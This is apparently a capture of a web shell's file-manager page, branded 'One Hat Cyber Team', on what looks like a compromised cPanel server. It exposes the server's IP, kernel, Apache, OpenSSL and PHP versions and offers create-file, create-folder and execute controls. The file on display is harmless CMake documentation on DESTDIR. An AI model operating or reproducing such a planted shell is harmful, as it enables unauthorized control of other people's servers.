⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.23
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
cmake3
/
Help
/
envvar
/
View File Name :
DESTDIR.rst
DESTDIR ------- .. include:: ENV_VAR.txt On UNIX one can use the ``DESTDIR`` mechanism in order to relocate the whole installation. ``DESTDIR`` means DESTination DIRectory. It is commonly used by makefile users in order to install software at non-default location. It is usually invoked like this: :: make DESTDIR=/home/john install which will install the concerned software using the installation prefix, e.g. ``/usr/local`` prepended with the ``DESTDIR`` value which finally gives ``/home/john/usr/local``. WARNING: ``DESTDIR`` may not be used on Windows because installation prefix usually contains a drive letter like in ``C:/Program Files`` which cannot be prepended with some other prefix.